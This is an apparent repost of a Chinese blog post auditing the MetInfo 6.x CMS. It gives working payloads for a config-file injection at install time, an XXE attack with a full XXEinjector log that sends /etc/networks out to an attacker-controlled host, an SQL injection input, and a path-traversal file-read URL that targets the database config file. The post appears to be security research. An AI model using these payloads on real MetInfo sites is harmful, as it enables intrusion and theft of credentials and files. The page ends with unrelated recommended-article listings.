MetInfo最新版代码审计漏洞合集

最新推荐文章于 2024-05-10 23:56:01 发布
最新推荐文章于 2024-05-10 23:56:01 发布
阅读量3k 收藏 1
点赞数 1
分类专栏: Web安全
原文链接:https://mp.weixin.qq.com/s/kmrIJnTdZtaQyQRTvL-6dQ
版权

最近想给 X 天贡献点插件,时常会去留意 seebug 的最新漏洞列表,发现最近 MetInfo 的漏洞上座率蛮高的,就挑它来代码审计了一波。

seebug 上均是 MetInfo 6.0.0 版本的,官方已更新至 6.1.0 上述问题是否修复了呢?

入口文件

这个框架的入口文件很多,都是index.php,比如online/index.php文件:

<?php
define('M_NAME', 'online');
define('M_MODULE', 'web');
define('M_CLASS', 'online');
define('M_ACTION', 'do_online');
require_once '../app/system/entrance.php';

定义了四个常量,用于框架载入时区分入口来源、所属模块、调用类及方法,最后载入entrance.php调用里面的静态方法load::module(); 加载所需模块。

通过查找index.php入口文件,找到可以达到前台大多数方法的文件: /member/index.php。

<?php
$M_MODULE='web';
if(@$_GET['m']) $M_MODULE=$_GET['m'];
if(@!$_GET['n']) $_GET['n'] = "user";
if(@!$_GET['c']) $_GET['c'] = "profile";
if(@!$_GET['a']) $_get['a'] = "doindex";
@define('M_NAME', $_GET['n']);
@define('M_MODULE', $M_MODULE);
@define('M_CLASS', $_GET['c']);
@define('M_ACTION', $_GET['a']);
require_once '../app/system/entrance.php';

可以看到,通过控制$_GET我们可以到达大多数方法。为什么是大多数呢?因为无法直接控制_load_class加载系统类。

里面的$action必须要do开头,也就是调用的方法名必须要do开头。

图片

低版本信息泄漏

在安装之前,我首先对比了一下两个版本的修改文件记录,发现上一个版本的install文件夹中存在一个phpinfo.php文件,里面就是一段<?php phpinfo(); ?> 代码(6.1.0版本中已删除)。

这就方便我们获取目标网站的绝对路径,后期不管是写shell还是存在文件读取的情况,可以快速定位及利用。

图片

网上找到的实例:

图片

安装时写getshell

前提条件:

想利用此处首先需要删除config/install.lock安装锁文件。

在安装过程中执行到db_setup(3.数据库设置)步骤时,发现存在配置文件任意更改的情况。

最近在看<php配置文件写入问题>

https://github.com/CHYbeta/Code-Audit-Challenges/blob/master/php/challenge-3.md)

一直想找机会将它写一篇文章刚好这个 CMS 给了我机会。

图片

关键函数fputs()它是fwrite()函数的别名,用于文件写入。而且这里的逻辑也存在问题,应该将对文件的操作放在数据库连接判断后面。

当我们提交payload后:

setup=1&db_type=mysql&db_prefix=met_met"*/phpinfo();/*
&db_host=localhost&db_name=met&db_username=root&db_pass=
&cndata=yes&endata=yes&showdata=yes&submit=保存数据库设置并继续

虽然页面提示:数据库连接数据库失败,但config/config_db.php文件内容已经被改变了。

参数受到64行代码影响,'__COOKIE', '_POST', '_GET'传递都会加上addslashes()函数,所以单/双引号会在前面加个反斜杠。

<?php
    /*
    con_db_host = "localhost"
    con_db_port = "3306"
    con_db_id = "root"
    con_db_pass = ""
    con_db_name = "met"
    tablepre = "met_met\"*/phpinfo();/*"
    db_charset = "utf8";
    */
?>

我们访问下看下:

图片

实际上就是用*/去闭合最外层的/*,多行注释的优先级是很高的。

XXE漏洞

漏洞发生在此处文件: app/system/pay/web/pay.class.php,未禁外部实体加载:

图片

测试下是否存在外部引用:

图片

使用XXEinjector工具来验证漏洞,读取本地文件:

# x @ xdeMacBook-Pro in ~/work/tools/HackTools/xxe/XXEinjector on git:master x [19:42:19] C:1
$ cat /etc/networks
##
# Networks Database
##
loopback127loopback-net

# x @ xdeMacBook-Pro in ~/work/tools/HackTools/xxe/XXEinjector on git:master x [19:42:29]
$ cat phprequest.txt
POST /member/index.php?a=donotify&m=web&c=pay&n=pay HTTP/1.1
Host:cms777.com
User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0
Accept:application/json, text/javascript, */*; q=0.01
Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding:gzip, deflate
Content-Type:text/xml
Referer:http://cms777.com/\;
X-Requested-With:XMLHttpRequest
DNT:1
Connection:close
Pragma:no-cache
Cache-Control:no-cache
Content-Length:129

XXEINJECT
<data>4</data>

# x @ xdeMacBook-Pro in ~/work/tools/HackTools/xxe/XXEinjector on git:master x [19:42:34]
$ sudo ./XXEinjector.rb --host=192.168.31.21 --file=/Users/x/work/tools/HackTools/xxe/XXEinjector/phprequest.txt --path=/etc/networks --verbose --httpport=89 --oob=http --phpfilter
XXEinjector by Jakub Pałaczyński

Enumeration options:
"y" - enumerate currect file (default)
"n" - skip currect file
"a" - enumerate all files in currect directory
"s" - skip all files in currect directory
"q" - quit

[+]Sending request with malicious XML:
http://cms777.com:80/member/index.php?a=donotify&m=web&c=pay&n=pay
{"User-Agent"=>"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0", "Accept"=>"application/json, text/javascript, */*; q=0.01", "Accept-Language"=>"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding"=>"gzip, deflate", "Content-Type"=>"text/xml", "Referer"=>"http://cms777.com/\\;", "X-Requested-With"=>"XMLHttpRequest", "DNT"=>"1", "Connection"=>"close", "Pragma"=>"no-cache", "Cache-Control"=>"no-cache", "Content-Length"=>"118"}

<!DOCTYPE convert [ <!ENTITY % remote SYSTEM "http://192.168.31.21:89/file.dtd">%remote;%int;%trick;]>
<data>4</data>

[+]Got request for XML:
GET /file.dtd HTTP/1.0

[+]Responding with XML for:/etc/networks
[+]XML payload sent:
<!ENTITY % payl SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/networks">
<!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://192.168.31.21:89/?p=%payl;'>">

[+]Response with file/directory content received:
GET /?p=IyMKIyBOZXR3b3JrcyBEYXRhYmFzZQojIwpsb29wYmFjawkxMjcJCWxvb3BiYWNrLW5ldAo=HTTP/1.0

[+]Retrieved data:
[+]Nothing else to do. Exiting.

IyMKIyBOZXR3b3JrcyBEYXRhYmFzZQojIwpsb29wYmFjawkxMjcJCWxvb3BiYWNrLW5ldAo= 的内容正好是 /etc/networks 文件内的内容。

对比 6.1.0 版本,此处未被修复,XXE 存在。

图片

此处还存在一个 鸡助的SQL注入

当传递 XML 内容:

<data>
<out_trade_no>' and '1'='1</out_trade_no>
</data>

会进入GetOrder()方法:

if ($array && $array['out_trade_no']) {
    $date = $this->GetOrder($array['out_trade_no']);
    %this->doNotify_wxpay($date);
}

方法内部,$out_trade_no变量直接拼接进了sql语句中:

public function GetOrder($out_trade_no) {
    global $_M;
    if ($out_trade_no) {
        $query = "SELECT * FROM {$_M['table']['pay_order']} WHERE out_trade_no='{$out_trade_no}' ";
        $array = DB::get_one($query);
        return $array;
    } else {
        return FALSE;
    }
}

但是,利用的前提要满足$_M['table']['pay_order']表存在,不然无法造成攻击:

图片

然后,亲切问候一下:您忙,我吃柠檬,您开心就好!~

图片

任意文件读取

我们全局正则搜索下 \$_GET|\$_POST,发现一处可疑的地方接收$_GET['dir']。

图片

从图中的代码中可以看到,接收外部参数后,将文件读入缓存中后再用flush()函数刷新输出缓冲至浏览器。

但目录地址不能直接使用,需要进入if函数中去,而$dir变量中的字符串前4位必须要有http。

我赌一块钱,当初写这段代码的程序员是想加外链图片的显示。

当然我们传入./.../后,经过str_replace函数替换后会得到一个.,而单独的/是不会被过滤的,如此反复即可构造出突破限制的路径。

最终的payload:

/member/index.php?a=doshow&m=include&c=old_thumb&dir=http/./.../..././/./.../..././/config/config_db.php

图片

zhangge3663
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MajorDoMo thumb.php 未授权RCE漏洞复现(CNVD-2024-02175)
0xSec
04-16 753
MajorDoMo /modules/thumb/thumb.php接口处存在远程命令执行漏洞,未经身份验证的攻击者可利用此漏洞执行任意指令,获取服务器权限。
MetInfo7.5.0代码审计(后台SQL注入+md5弱类型比较)1
08-03
MetInfo7.5.0代码审计(后台SQL注入+md5弱类型比较)1
漏洞挖掘姿势之metinfo 建站系统-任意文件读取漏洞
最新发布
Grace_for_it的博客
05-10 499
metinfo 建站系统 任意文件读取漏洞 漏洞挖掘
MetInfo任意文件读取】--任意文件读取漏洞
m0_63241485的博客
08-29 3665
任意文件读取漏洞分析
ROS学习(八):ROS URDF->transmission
飘零过客
01-08 4158
用来描述关节和驱动器之间的关系。可以定义关节传动比和连杆之间的关系等。 通过复杂的转化可以把多驱动器和多关节联系在一起。
Gazebo仿真学习——3.使用ROS-control设置模拟控制器驱动机器人关节
huangjunsheng123的博客
09-04 5550
1.Kinova_ROS软件包官网镇楼:https://github.com/Kinovarobotics/kinova-ros#moveit. 2.Gazebo for Kinova robots官网:https://github.com/Kinovarobotics/kinova-ros/wiki/Gazebo. 下载kinova-ros软件包: git clone https://github.com/Kinovarobotics/kinova-ros 【说明】kinova-ros 机械臂使用ros
01、版本管理-GIT
快把钟哥带走
06-12 166
一、版本控制 版本控制,通过文档控制记录各个模块的改动,并给每次改动添加序号,用于存储、追踪目录和文件的修改历史。 二、版本控制软件 GIT 分布式版本控制系统 SVN 集中式版本控制系统 三、git安装 1、git下载 - https://git-scm.com/downloads - https://pan.baidu.com/s/1kU5OCOB#list/path=%2...
MetInfo企业网站管理系统最新官方版
04-03
MetInfo企业网站管理系统最新官方版,该系统是多国语言的企业建站系统,MetInfo企业网站管理系统采用PHP+Mysql架构,全站内置了SEO搜索引擎优化机制,支持用户自定义界面语言(全球各种语言),拥有企业网站常用的模块...
metinfo 后台sql注入1
08-03
MetInfo 后台SQL注入漏洞详解》 MetInfo,一款基于PHP和MySQL构建的内容管理系统,因其功能丰富和易于使用而广受欢迎。然而,随着技术的发展,安全问题也日益凸显。本文将深入探讨MetInfo 6.1.0版本中的一个SQL...
MetInfo企业网站管理系统 v3.0版
03-26
MetInfo企业网站管理系统v3.0 开发进展与最新情况请访问官方网站:www.metinfo.cn。 全新安装:将压缩包内的所有文件上传到空间,运行网站地址便可以自动安装! 本安装程序更新日期为2010年3月10日,最新程序及免费...
MetInfo 企业建站系统 v5.3.16
12-01
4. **PHP基础友好**:对于具备一定PHP编程基础的用户,MetInfo 的源代码结构清晰,易于理解和修改,方便进行二次开发,满足企业的定制化需求。 5. **安装与升级**:文件列表中的“安装说明.txt”和“版本升级说明....
基于CentOS7的Matomo网站统计分析工具
huiskai的博客
01-17 1810
Matomo的前身是Piwik,是一套基于 PHP5+MySQL 技术构建的开源网站访问统计系统。Matomo可以给你详细的统计信息,比如网页浏览人数,访问最多的页面,搜索引擎关键词等等流量分析功能。此外,它还采用了插件扩展及开放 API 架构,可以让用户根据自已的实际需求创建更多的功能。Matomo让网站拥有自己的流量统计工具成为可能。
探究--gazebo里 关节是如何动起来的____总目录
月照银海似蛟龙的博客
01-06 1469
探究--gazebo里 关节是如何动起来的____总目录探究--gazebo里 关节是如何动起来的____实现默认插件joint控制探究--gazebo里 关节是如何动起来的____撸源码探究ros gazebo里的 硬件抽象构建探究--gazebo里 关节是如何动起来的____撸源码探究ros control里的 控制器探究--gazebo里 关节是如何动起来的____用自己的 硬件抽象插件探究...
metinfo_6.0.0 任意文件读取漏洞复现
薛定谔嘚喵博客
05-04 907
MetInfo是一套使用PHP和Mysql开发的内容管理系统。MetInfo 6.0.0~6.1.0版本中的 old_thumb.class.php文件存在任意文件读取漏洞。攻击者可利用漏洞读取网站上的敏感文件。
漏洞复现】Metinfo6.0.0任意文件读取
过期的秋刀鱼
08-31 1814
dir变量接受来自$_GET[‘dir’]传递进来的值,用了str_replace函数做替换,将。漏洞简介:MetInfo是一套使用PHP和MySQL开发的内容管理系统,其中的。文件存在任意文件读取漏洞,攻击者可利用该漏洞读取网站的敏感文件。漏洞名称:MetInfo任意文件读取。影响版本:MetInfo 6.0.0。
metinfo5.0 文件包含漏洞分析
Au_Wind的博客
11-06 266
基于代码审计,对metinfo5.0文件包含漏洞分析复现
记一次MetInfo6.0.0文件包含漏洞复现
weixin_55404107的博客
10-20 1738
进行漏洞复现,读取敏感文件
Gazebo机械臂仿真及关节控制_ur&aubo
hanmoge的博客
01-16 1135
1. 安装 universal_robot: https://github.com/ros-industrial/universal_robot 按照安装指导中的build from source方法安装,直接使用apt-get的话会遇到与gazebo8不适配的情况。 2. ROS与机械臂: http://blog.exbot.net/archives/3337 https://myyerrol.io/zh-cn/2017/04/20/ros_experience_2_xmbot_arm/
漏洞复现】Metinfo6.0.0任意文件读取漏洞复现
过期的秋刀鱼
11-05 395
dir变量接受来自$_GET[‘dir’]传递进来的值,用了str_replace函数做替换,将。漏洞简介:MetInfo是一套使用PHP和MySQL开发的内容管理系统,其中的。文件存在任意文件读取漏洞,攻击者可利用该漏洞读取网站的敏感文件。漏洞名称:MetInfo任意文件读取。影响版本:MetInfo 6.0.0。
metinfo5.0.zip
08-29
metinfo5.0.zip是一个软件压缩包,其中包含了MetInfo5.0版本的相关文件和代码。MetInfo是一款基于PHP+MySQL的网站建设系统,可以帮助用户快速搭建和管理自己的网站。 MetInfo5.0版本是MetInfo官方最新发布的版本,相较于之前的版本,它在功能和性能上有了更多的优化和改进。该版本提供了更多的模板样式和插件选择,用户可以根据自己的需求选择适合自己的模板和功能插件来建立个性化的网站。 软件压缩包metinfo5.0.zip中包含了MetInfo5.0版本的文件和代码,用户可以通过解压缩包得到相关的文件。在使用MetInfo5.0版本建立网站之前,需要先进行安装。用户可以将解压后的文件上传到服务器,并按照MetInfo官方提供的安装步骤进行操作。安装完成后,用户可以通过访问网站来查看和管理建立的网站。 MetInfo5.0版本具有响应式设计,适配各种终端设备,可以在电脑、手机和平板等不同设备上正常浏览和操作。该版本还具备SEO优化功能,可以提升网站在搜索引擎中的排名,吸引更多的访问者。 总之,metinfo5.0.zip是包含MetInfo5.0版本文件和代码的压缩包,通过安装该版本可以建立个性化、响应式设计并具备SEO优化功能的网站。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值